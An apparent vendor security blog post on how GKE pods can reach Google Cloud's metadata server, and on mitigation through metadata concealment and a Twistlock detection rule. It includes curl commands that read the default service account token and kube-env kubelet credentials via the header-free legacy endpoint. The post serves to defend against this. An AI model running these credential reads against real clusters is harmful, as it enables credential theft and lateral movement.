In this post I’ll address the issue of internal data that is accessible on current cloud platforms. Cloud providers generally expose some form of metadata to machine or container instances: information about the environment, project details, and even sensitive items like tokens and SSH keys.

From a developer’s perspective this is a convenient perk when designing programs for these platforms. From a security standpoint, however, exposing information about the environment, not to mention secrets, can be hazardous.

By nature, containerized environments make it harder for an attacker to spread out after breaching one vulnerable instance, because a container generally includes only the program itself and its data. For example, an nginx container should include only the nginx binaries, configuration files, and logs. After successfully attacking such a container, an attacker can only damage that particular instance, and has no clue what else is available in the cluster.

Metadata of the kind exposed by cloud platforms can help an attacker pivot to a much bigger attack. Names and specifics of machines in the same environment hint at what further attacks may be possible, and exposed keys, secrets, and tokens can be used to actively breach other instances.

What kind of data is available?

For the sake of this post, let’s examine specifically what metadata is available for Google Cloud instances. The official documentation can be found here.

The data is accessible from an HTTP metadata server at http://metadata.google.internal/computeMetadata. Responses are in text form (application/text), but it is possible to request JSON instead. The documentation covers the v1 metadata server, which requires a specific header on every HTTP request (Metadata-Flavor: Google). However, the old metadata server, v1beta1, is still accessible without this header.
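As a rough sketch of what this looks like in practice (paths taken from Google’s documentation; exact output will vary by instance), the header requirement can be checked with curl:

    # v1 requires the Metadata-Flavor header; requests without it are rejected
    curl -H "Metadata-Flavor: Google" \
      http://metadata.google.internal/computeMetadata/v1/instance/hostname

    # the legacy v1beta1 endpoint answers even without the header
    curl http://metadata.google.internal/computeMetadata/v1beta1/instance/hostname

    # directory listings can also be requested as JSON
    curl -H "Metadata-Flavor: Google" \
      "http://metadata.google.internal/computeMetadata/v1/?recursive=true&alt=json"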

The examples shown below are from an Ubuntu pod on my GKE cluster, which I started in order to simulate what an attacker could access after breaching one pod.
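A few of the reconnaissance queries from that pod looked roughly like the following; no special header is needed on the legacy endpoint:

    # project and instance details, readable from a freshly breached pod
    curl http://metadata.google.internal/computeMetadata/v1beta1/project/project-id
    curl http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/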

One recent example of an attack using this metadata server was disclosed in a HackerOne report on Shopify’s infrastructure. In that exploit chain, the attacker relies on an SSRF vulnerability to access internal cluster metadata, which eventually leads to full root access on all of the cluster’s instances.
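Without reproducing the full chain here, the sensitive reads at its core are along these lines; kube-env is a GKE instance attribute that at the time contained kubelet credentials (see the report itself for complete details):

    # token for the instance's default service account
    curl http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token

    # GKE node bootstrap configuration, which included kubelet credentials
    curl http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/kube-env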

Kubernetes solution

Google is well aware of the risks of pods accessing metadata. As mentioned in the report above, Google suggests mitigating the issue by enabling metadata concealment on the Kubernetes cluster, a feature available from Kubernetes 1.9.3. See Google’s documentation on enabling this feature. Note, however, that this is only a temporary solution while Google’s engineers work on a more thorough resolution.
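At the time of writing, concealment is enabled through a gcloud beta flag when creating a cluster (or node pool); the cluster name below is a placeholder, and the flag may change as the feature matures:

    # create a cluster whose pods sit behind a filtering metadata proxy
    gcloud beta container clusters create my-cluster \
      --workload-metadata-from-node=SECURE

With concealment on, the proxy blocks pods from reaching sensitive values such as kube-env and the node’s bootstrapping credentials.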

Twistlock’s Kubernetes protection

Twistlock has a feature to detect and alert on suspicious behavior in Kubernetes pods, which can be used in the event of an attack.

This feature uses a variety of heuristics applied to Kubernetes API data, pod egress traffic, and API master payloads to detect attacks like this one and many others. It detects attempts to access Google Cloud metadata from unprivileged pods. As demonstrated earlier, such attempts could suggest that an attacker is trying to breach the cluster or obtain access to other pods. If this is the case, Twistlock will create an incident report.

An incident like this is indicative of a pod compromise and requires deeper investigation. Of course, Twistlock has many layers of defense in depth at runtime to prevent this in the first place, and reviewing the container’s other activity in Incident Explorer is a good place to start.

The feature, labeled “Kubernetes advanced protection”, is enabled by creating a Runtime rule and enabling the “Detect Kubernetes attacks” switch.

To test the protection in effect, you can pop a shell and attempt to access internal metadata resources, for instance http://metadata.google.internal/computeMetadata:
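For example (assuming a pod named ubuntu, a placeholder name, in the default namespace):

    # open a shell inside the running pod
    kubectl exec -it ubuntu -- /bin/bash

    # from inside the pod, probe the metadata server
    curl http://metadata.google.internal/computeMetadata/v1beta1/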

Finally, Twistlock will alert on the attempted Kubernetes attack.

Final note

Our Twistlock Labs research team continuously monitors the state of the art in Kubernetes attacks, in addition to performing its own first-party research. The logic and lessons from these public and internal sources flow out through the Intelligence Stream, keeping customer environments protected against emerging threats.
